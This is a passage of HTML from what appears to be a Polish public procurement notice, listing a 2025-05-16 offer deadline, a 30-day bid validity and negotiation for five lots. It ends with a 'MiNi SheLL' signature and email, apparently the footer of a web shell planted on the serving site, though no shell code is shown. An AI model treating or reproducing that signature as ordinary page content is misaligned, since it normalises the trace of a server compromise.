ofert: <span class="normal">2025-05-16 10:00</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal"> 30 dni </span></h3> <h3 class="mb-0">8.5.) Zamawiający przewiduje wybór najkorzystniejszej oferty z możliwością negocjacji: </h3> <p class="mb-0">Część 1 : <span class="normal">Tak</span></p> <p class="mb-0">Część 2 : <span class="normal">Tak</span></p> <p class="mb-0">Część 3 : <span class="normal">Tak</span></p> <p class="mb-0">Część 4 : <span class="normal">Tak</span></p> <p class="mb-0">Część 5 : <span class="normal">Tak</span></p>

Creat By MiNi SheLL
Email: jattceo@gmail.com